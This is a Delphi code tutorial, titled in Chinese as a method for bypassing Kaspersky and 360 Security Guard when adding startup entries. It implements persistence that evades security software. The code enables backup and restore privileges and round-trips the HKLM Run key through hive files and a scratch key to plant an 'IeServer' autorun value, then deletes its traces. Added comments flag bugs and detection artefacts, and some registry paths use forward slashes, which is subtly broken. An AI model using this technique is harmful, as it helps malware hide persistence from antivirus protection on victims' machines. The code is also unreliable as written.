写程序启动项时如何过卡巴与360安全卫士等软件的方法


// Enables SeBackupPrivilege in the access token of the current process.
// SaveKey2 calls this before RegSaveKey, which needs that privilege to write
// a registry key out to a hive file.
// Defender note: a process that enables SeBackupPrivilege and then saves a
// registry key to a file is the first half of the save/restore sequence on
// this page; privilege-use auditing can surface it.
procedure SetPrivilege;
const
  ADJUST_PRIV = TOKEN_QUERY or TOKEN_ADJUST_PRIVILEGES;
  // NOTE(review): the name suggests a shutdown privilege, but the value is the
  // backup privilege.
  SHTDWN_PRIV = 'SeBackupPrivilege';
      // SeBackupPrivilege: back up files and directories.
      // Allows the user to bypass file and directory permissions in order to make
      // backups. The privilege is checked only when an application tries to go
      // through the NTFS backup API. By default it is assigned to Administrators
      // and Backup Operators.
  PRIV_SIZE = sizeOf(TTokenPrivileges);
var
  TokenPriv, Dummy: TTokenPrivileges;
  Token: THandle;
  Len: DWORD;
begin
  // NOTE(review): none of the three API results below is checked, and Token is
  // never passed to CloseHandle, so every call leaks one handle.
  OpenProcessToken(GetCurrentProcess(), ADJUST_PRIV, Token);
  LookupPrivilegeValue(nil, SHTDWN_PRIV, TokenPriv.Privileges[0].Luid);
  TokenPriv.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
  TokenPriv.PrivilegeCount := 1;
  // A TRUE result from AdjustTokenPrivileges does not by itself prove the
  // privilege was enabled: when the token does not hold the privilege,
  // GetLastError reports ERROR_NOT_ALL_ASSIGNED. That check is absent here.
  AdjustTokenPrivileges(Token, false, TokenPriv, PRIV_SIZE, Dummy, Len);
end;

// Enables SeRestorePrivilege in the access token of the current process.
// regstore2 calls this before RegRestoreKey, which needs that privilege to
// load a hive file over an existing key.
// Defender note: enabling SeRestorePrivilege followed by RegRestoreKey on an
// autorun key is the write step of the sequence on this page.
procedure SetPrivilege2;
var
  TPPrev, TP: TTokenPrivileges;
  TokenHandle: THandle;
  dwRetLen: DWORD;
  lpLuid: TLargeInteger;
begin
  // NOTE(review): TOKEN_ALL_ACCESS asks for far more than this needs;
  // SetPrivilege above requests only TOKEN_QUERY or TOKEN_ADJUST_PRIVILEGES.
  // The result is unchecked, so CloseHandle below may receive an
  // uninitialised handle if the open fails.
  OpenProcessToken(GetCurrentProcess, TOKEN_ALL_ACCESS, TokenHandle);
  if (LookupPrivilegeValue(nil, 'SeRestorePrivilege', lpLuid)) then
      // SeRestorePrivilege: restore files and directories.
      // Allows the user to bypass file and directory permissions in order to
      // restore backed-up files. By default held by Administrators and Backup
      // [Operators - the original comment is cut off here].
  begin
    TP.PrivilegeCount := 1;
    TP.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
    TP.Privileges[0].Luid := lpLuid;
    // TPPrev receives the previous privilege state and is not used afterwards.
    // The result is not checked (no ERROR_NOT_ALL_ASSIGNED test).
    AdjustTokenPrivileges(TokenHandle, False, TP, SizeOf(TPPrev), TPPrev, dwRetLen);

  end;
  CloseHandle(TokenHandle);
end;

// Creates (or opens) `subkey` under the root `key` and writes `value` as a
// REG_EXPAND_SZ value called `name`.
// Returns True when RegSetValueEx reports success (0), False otherwise.
// NOTE(review): the result of RegCreateKey is not checked, so on failure the
// set/close calls run on an uninitialised handle. The byte count passed is
// length(value), without the terminating null.
function addreg(key: Hkey; subkey, name, value: string): boolean;
var
  OpenedKey: HKEY;
begin
  RegCreateKey(key, PChar(subkey), OpenedKey);
  Result := RegSetValueEx(OpenedKey, PChar(name), 0, REG_EXPAND_SZ,
    PChar(value), Length(value)) = 0;
  RegCloseKey(OpenedKey);
end;

// Saves a registry key to the hive file `filename` through RegSaveKey.
//   key      - 1 selects HKEY_CURRENT_USER; any other value selects
//              HKEY_LOCAL_MACHINE.
//   subkey   - path of the key to open under that root.
//   filename - destination file for the saved hive.
// Returns True only when RegSaveKey returns ERROR_SUCCESS.
// SetPrivilege is called first to enable SeBackupPrivilege.
// Defender note: RegSaveKey leaves a hive file on disk (this page uses files
// in the root of C:), which file-creation telemetry can pick up.
function SaveKey2(key: integer; subkey, filename: string): Boolean;
var
  RootKey, OpenedKey: HKEY;
begin
  SetPrivilege;
  Result := False;

  if key = 1 then
    RootKey := HKEY_CURRENT_USER
  else
    RootKey := HKEY_LOCAL_MACHINE;

  // NOTE(review): the RegOpenKey result is ignored; only the handle value is
  // tested afterwards.
  RegOpenKey(RootKey, PChar(subkey), OpenedKey);
  if OpenedKey = 0 then
    Exit;

  try
    Result := RegSaveKey(OpenedKey, PChar(filename), nil) = ERROR_SUCCESS;
  finally
    RegCloseKey(OpenedKey);
  end;
end;

// Loads the hive file `hfile` over an existing registry key with
// RegRestoreKey.
//   key    - 1 selects HKEY_CURRENT_USER; any other value selects
//            HKEY_LOCAL_MACHINE.
//   subkey - path of the key whose contents are replaced.
//   hfile  - hive file written earlier by RegSaveKey.
// SetPrivilege2 is called first to enable SeRestorePrivilege.
// Defender note: the key's contents change without any RegSetValueEx call on
// it, so monitoring of autorun keys has to cover RegRestoreKey (and the
// resulting key state) as well as individual value writes.
procedure regstore2(key: integer; subkey, hfile: string);
var
  RootKey, TargetKey: HKEY;
begin
  SetPrivilege2;

  if key = 1 then
    RootKey := HKEY_CURRENT_USER
  else
    RootKey := HKEY_LOCAL_MACHINE;

  RegOpenKey(RootKey, PChar(subkey), TargetKey);

  // Flag value 8 corresponds to REG_FORCE_RESTORE in the Windows SDK.
  if TargetKey <> 0 then
    RegRestoreKey(TargetKey, PChar(hfile), 8);

  // NOTE(review): the close runs even when the open failed.
  RegCloseKey(TargetKey);
end;

// Adds `exefile` as an autorun entry without calling RegSetValueEx on the
// Run key itself, using a save/restore round trip through a scratch key:
//   1. save the HKLM Run key to c:/1.abc;
//   2. restore that file into the scratch key HKCU Software/fengzi;
//   3. add the value 'IeServer' = exefile to the scratch key;
//   4. save the scratch key to c:/2.abc;
//   5. restore c:/2.abc over the HKLM Run key;
//   6. delete the scratch key and both hive files.
// Needs SeBackupPrivilege and SeRestorePrivilege, which the comments on this
// page say are assigned by default to Administrators and Backup Operators.
// Defender note: observable artefacts are the two hive files in the root of
// C:, the short-lived HKCU Software/fengzi key, enablement of both privileges
// in one process, RegSaveKey/RegRestoreKey touching the Run key, and a new
// 'IeServer' value in Run afterwards. Alerting on changes to the final state
// of autorun keys catches this whichever API made the write.
procedure regstore(exefile: string);
var
  key: HKEY;
  I: Integer;
begin
  // Step 1: results of SaveKey2 / regstore2 / addreg are ignored throughout.
  SaveKey2(2, PChar('SOFTWARE/Microsoft/Windows/CurrentVersion/Run'), 'c:/1.abc');

  // Step 2: create the scratch key, then load the saved Run contents into it.
  RegCreateKey(HKEY_CURRENT_USER, PChar('Software/fengzi'), key);
  // The same restore is issued five times; the page gives no reason for the
  // repetition.
  for i := 1 to 5 do
    regstore2(1, 'Software/fengzi', 'c:/1.abc');
  // Step 3: the only direct value write, made on the scratch key.
  addreg(HKEY_CURRENT_USER, 'Software/fengzi', 'IeServer', exefile);

  // Steps 4-5: save the scratch key and restore it over the Run key.
  SaveKey2(1, PChar('Software/fengzi'), 'c:/2.abc');
  for i := 1 to 5 do
    regstore2(2, PChar('SOFTWARE/Microsoft/Windows/CurrentVersion/Run'), 'c:/2.abc');

  // Step 6: clean-up. The scratch key is deleted while `key` is still open;
  // the handle is closed afterwards.
  RegDeleteKey(HKEY_CURRENT_USER, 'Software/fengzi');
  RegCloseKey(key);
  DeleteFile('c:/1.abc');
  DeleteFile('c:/2.abc');
end;

// Button click handler for the demo form: runs regstore with the hard-coded
// executable path 'c:/1.exe'. Sender is not used.
procedure TForm1.Button1Click(Sender: TObject);
begin
  regstore('c:/1.exe');
end;
